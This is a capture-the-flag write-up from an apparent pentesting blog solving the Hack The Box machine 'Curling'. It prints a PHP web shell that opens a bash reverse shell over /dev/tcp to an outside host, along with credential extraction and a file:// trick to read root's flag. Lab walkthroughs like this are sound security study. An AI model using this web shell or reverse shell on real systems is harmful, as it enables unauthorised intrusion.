30 March 2023

Pentesting Fun Stuff

following the cyber security path…

Curling

4 years ago n0w4n

As usual I’m starting with a port scan to get a list of open ports and running services.

root@n0w4n:~/htb/curling# nmap -n -T4 -sS -sV -sC -oN portscan -p- 10.10.10.150

For this scan I’m using the flags -T for speed, -sS for syn-scan (is run by default as root – but I’ll use it nevertheless), -sV for version of running service, -sC for a script scan of the Nmap scripting engine (NSE), -oN to get the result in a text file and final -p- for all 65535 TCP ports. UDP I skip by default as it takes a very long time to scan.

Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-15 19:51 CET
Nmap scan report for 10.10.10.150
Host is up (0.026s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE   VERSION
22/tcp open  ssh       OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
|   256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_  256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open  ssl/http?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 141.68 seconds

And this is the result of the scan. I omitted the -O flag which you can use to get an educated guess of the targeted operating system.
The response of the service behind port 80 is giving back that the port is open but nmap can’t determine what kind of service is running behind it.
When I try and direct my browser to it……it tries to connect, but doesn’t get any result.
So I use view-source: and as result I get the source code of the main page.
At the bottom of the page there is a comment which gets my attention:

</body>
      <!-- secret.txt -->
</html>
Q3VybGluZzIwMTgh

Looks like bas64.

root@n0w4n:~# echo "Q3VybGluZzIwMTgh" | base64 -d
Curling2018!

A password maybe? But where?
The site hosts a Joomla CMS. So maybe to find the default login page.
The only problem I face at the moment is that I thought the loading of the site was normal. But it isn’t!
It just runs a Joomla site and you need to get some information about getting in and secret.txt is one lead.
But the machine is just damn unstable. When looking at the forum it seems that the site runs fine with other users, but there is a lot of complaining about resetting the machine a lot and changing stuff like index.php……which will ruin it for others (as we all use the same machine).
So I need to suck it up and keep at it. Unfortunately I just ran a dirSearch scan and a joomscan and the box gets reset….again!!!!
This is no fun.
After a few tries it seems that the machine is running fine and the site is loaded properly.
Because I found something that could work as a password…I needed to find an username. Admin and Administrator didn’t work, so when checking the site there was a name: Floris.
This got me in as Super User.
And the machine gets another reset 🙁
I didn’t had much time to get a good look at my options, but it looked like I could edit the articles published on the site.
A next step would be to alter one of the articles and embed a reverse shell php script.
But a quick scan of the webserver shows the index.php is 0 byte. So maybe people are messing with the index.php and then reset the machine if it doesn’t work.
This is annoying.
Now that I know my initial scan was misguided by other hackers messing with the machine I ran a port scan again….and got a different result.

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

That’s more like it. So to get a working shell I just need to endure the endless resets on this machine.
After a while the machine seems to be stable and I use the creds to get into the admin console and enumerate the modules.
Because there was nothing useful I installed Simple file upload and after some modifications I was able to upload a working php script that gives me a reverse shell:

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.13.45/1337 0>&1'");
?>
root@n0w4n:~/htb/carrier# nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.13.45] from (UNKNOWN) [10.10.10.150] 49626
bash: cannot set terminal process group (1158): Inappropriate ioctl for device
bash: no job control in this shell
www-data@curling:/var/www/html/images$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@curling:/var/www/html/images$

Now to get some better privs.

www-data@curling:/home/floris$ ls -lah
ls -lah
total 48K
drwxr-xr-x 6 floris floris 4.0K Nov 16 12:16 .
drwxr-xr-x 3 root   root   4.0K May 22 18:33 ..
lrwxrwxrwx 1 root   root      9 May 22 19:14 .bash_history -> /dev/null
-rw-r--r-- 1 floris floris  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 floris floris 3.7K Apr  4  2018 .bashrc
drwx------ 2 floris floris 4.0K May 22 18:34 .cache
drwx------ 3 floris floris 4.0K May 22 18:34 .gnupg
drwxrwxr-x 3 floris floris 4.0K May 22 18:34 .local
-rw-r--r-- 1 floris floris  807 Apr  4  2018 .profile
-rw------- 1 floris floris  853 Nov 16 12:16 .viminfo
drwxr-x--- 2 root   floris 4.0K May 22 19:04 admin-area
-rw-r--r-- 1 floris floris 1.1K May 22 19:17 password_backup
-rw-r----- 1 floris floris   33 May 22 18:56 user.txt

It looks like there is a file called password_backup in the /home/floris folder.
To be save I’ll copy it to a tmp folder and work from there on.

www-data@curling:/tmp/n0w4n$ file password_backup
file password_backup
password_backup: ASCII text
www-data@curling:/tmp/n0w4n$ cat password_backup
cat password_backup
00000000: 425a 6839 3141 5926 5359 819b bb48 0000  BZh91AY&SY...H..
00000010: 17ff fffc 41cf 05f9 5029 6176 61cc 3a34  ....A...P)ava.:4
00000020: 4edc cccc 6e11 5400 23ab 4025 f802 1960  N...n.T.#.@%...`
00000030: 2018 0ca0 0092 1c7a 8340 0000 0000 0000   ......z.@......
00000040: 0680 6988 3468 6469 89a6 d439 ea68 c800  ..i.4hdi...9.h..
00000050: 000f 51a0 0064 681a 069e a190 0000 0034  ..Q..dh........4
00000060: 6900 0781 3501 6e18 c2d7 8c98 874a 13a0  i...5.n......J..
00000070: 0868 ae19 c02a b0c1 7d79 2ec2 3c7e 9d78  .h...*..}y..<~.x
00000080: f53e 0809 f073 5654 c27a 4886 dfa2 e931  .>...sVT.zH....1
00000090: c856 921b 1221 3385 6046 a2dd c173 0d22  .V...!3.`F...s."
000000a0: b996 6ed4 0cdb 8737 6a3a 58ea 6411 5290  ..n....7j:X.d.R.
000000b0: ad6b b12f 0813 8120 8205 a5f5 2970 c503  .k./... ....)p..
000000c0: 37db ab3b e000 ef85 f439 a414 8850 1843  7..;.....9...P.C
000000d0: 8259 be50 0986 1e48 42d5 13ea 1c2a 098c  .Y.P...HB....*..
000000e0: 8a47 ab1d 20a7 5540 72ff 1772 4538 5090  .G.. .U@r..rE8P.
000000f0: 819b bb48                                ...H

The first bytes of a file can give away its identity. When googling on 425a 6839 3141 5926 it showed that this was the typical header of a bz2 file.
The reason why file gave as output a ASCII file was because it was a hexdump of a bz2 file.

www-data@curling:/tmp/n0w4n$ xxd -r password_backup > pwb.bzip2
xxd -r password_backup > pwb.bzip2
www-data@curling:/tmp/n0w4n$ file pwb.bzip2
file pwb.bzip2
pwb.bzip2: bzip2 compressed data, block size = 900k

Now to decompress the file.

www-data@curling:/tmp/n0w4n$ bzip2 -d pwb.bzip2
bzip2 -d pwb.bzip2
bzip2: Can't guess original name for pwb.bzip2 -- using pwb.bzip2.out
www-data@curling:/tmp/n0w4n$ file pwb.bzip2.out
file pwb.bzip2.out
pwb.bzip2.out: gzip compressed data, was "password", last modified: Tue May 22 19:16:20 2018, from Unix

Another compression.

www-data@curling:/tmp/n0w4n$ mv pwb.bzip2.out pwb.gz
mv pwb.bzip2.out pwb.gz
www-data@curling:/tmp/n0w4n$ gunzip pwb.gz
gunzip pwb.gz

Gunzip needs gz as extension so I renamed the file first.

www-data@curling:/tmp/n0w4n$ file pwb
file pwb
pwb: bzip2 compressed data, block size = 900k

Another round of compression……getting a bit boring.
After another round of bzip2 decompressing and tar I got a txt file.

www-data@curling:/tmp/n0w4n$ tar xvf pwd.out
tar xvf pwd.out
password.txt
www-data@curling:/tmp/n0w4n$ cat password.txt
cat password.txt
5d<wdCbdZu)|hChXll

Aaaaaaaand the connection is lost due to another reset. As patiently as I am, I wait for another startup just to find out someone had corrupted the index.php. So no login possible.
Man this is getting really annoying. The machine doens’t look that difficult, but the many resets and the bungling of some people really makes it a challenge. I really don’t like giving up, but I have no idea how long this is going to be fun.
When the machine is reset again and seems to run stable I repeat the previous steps to get a reverse shell and su as floris with the found password.
I got some tty issues, but with python3 -c ‘import pty;pty.spawn(“/bin/bash”);’ that was sorted out quickly.

www-data@curling:/home/floris$ su floris
su floris
Password: 5d<wdCbdZu)|hChXll
floris@curling:~$ ls -lah
ls -lah
total 52K
drwxr-xr-x 7 floris floris 4.0K Nov 16 12:31 .
drwxr-xr-x 3 root   root   4.0K May 22 18:33 ..
drwxr-x--- 2 root   floris 4.0K May 22 19:04 admin-area
lrwxrwxrwx 1 root   root      9 May 22 19:14 .bash_history -> /dev/null
-rw-r--r-- 1 floris floris  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 floris floris 3.7K Apr  4  2018 .bashrc
drwx------ 2 floris floris 4.0K May 22 18:34 .cache
drwx------ 3 floris floris 4.0K May 22 18:34 .gnupg
drwxrwxr-x 3 floris floris 4.0K May 22 18:34 .local
-rw-r--r-- 1 floris floris 1.1K May 22 19:17 password_backup
-rw-r--r-- 1 floris floris  807 Apr  4  2018 .profile
drwxrwxr-x 3 floris floris 4.0K Nov 16 12:32 .scan
-rw-r----- 1 floris floris   33 May 22 18:56 user.txt
-rw------- 1 floris floris  853 Nov 16 12:16 .viminfo
floris@curling:~$ cat user.txt
cat user.txt
65dd1df0713b40d88ead98cf11b8530b

Finally….the first hash.
In the home folder there is a folder called admin-area which is a bit of a give-away.
Inside there are 2 files: input and report which are owned by root but can be  managed by floris.
The input file has a variable which directs to the localhost webserver. The report file is a http representation of that input.

floris@curling:~/admin-area$ cat input
cat input
url = "http://127.0.0.1"
floris@curling:~/admin-area$ file report
file report
report: HTML document, UTF-8 Unicode text, with very long lines, with CRLF, CR, LF line terminators

Let’s try and point the input var to a more interesting file.

floris@curling:~/admin-area$ ls -lah
ls -lah
total 16K
drwxr-x--- 2 root   floris 4.0K May 22 19:04 .
drwxr-xr-x 6 floris floris 4.0K May 22 19:18 ..
-rw-rw---- 1 root   floris   30 Nov 16 14:43 input
-rw-rw---- 1 root   floris  293 Nov 16 14:43 report
floris@curling:~/admin-area$ echo 'url = "file:///root/root.txt"' > input
echo 'url = "file:///root/root.txt"' > input
floris@curling:~/admin-area$ echo "" report
echo "" report
 report
floris@curling:~/admin-area$ echo "" > report
echo "" > report
floris@curling:~/admin-area$ ls -lah
ls -lah
total 16K
drwxr-x--- 2 root   floris 4.0K May 22 19:04 .
drwxr-xr-x 6 floris floris 4.0K May 22 19:18 ..
-rw-rw---- 1 root   floris   30 Nov 16 14:44 input
-rw-rw---- 1 root   floris    1 Nov 16 14:44 report
floris@curling:~/admin-area$ cat input
cat input
url = "file:///root/root.txt"
floris@curling:~/admin-area$ date
date
Fri Nov 16 14:44:46 UTC 2018
floris@curling:~/admin-area$ date
date
Fri Nov 16 14:44:52 UTC 2018
floris@curling:~/admin-area$ date
date
Fri Nov 16 14:44:56 UTC 2018
floris@curling:~/admin-area$ date
date
Fri Nov 16 14:44:59 UTC 2018
floris@curling:~/admin-area$ ls -lah
ls -lah
total 16K
drwxr-x--- 2 root   floris 4.0K May 22 19:04 .
drwxr-xr-x 6 floris floris 4.0K May 22 19:18 ..
-rw-rw---- 1 root   floris   30 Nov 16 14:44 input
-rw-rw---- 1 root   floris   33 Nov 16 14:45 report
floris@curling:~/admin-area$ cat report
cat report
82c198ab6fc5365fdc6da2ee5c26064a

And there we have it. The root flag.
Can’t say I really liked this machine, but that was mostly because of the many resets.
 
 
 
 
 

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.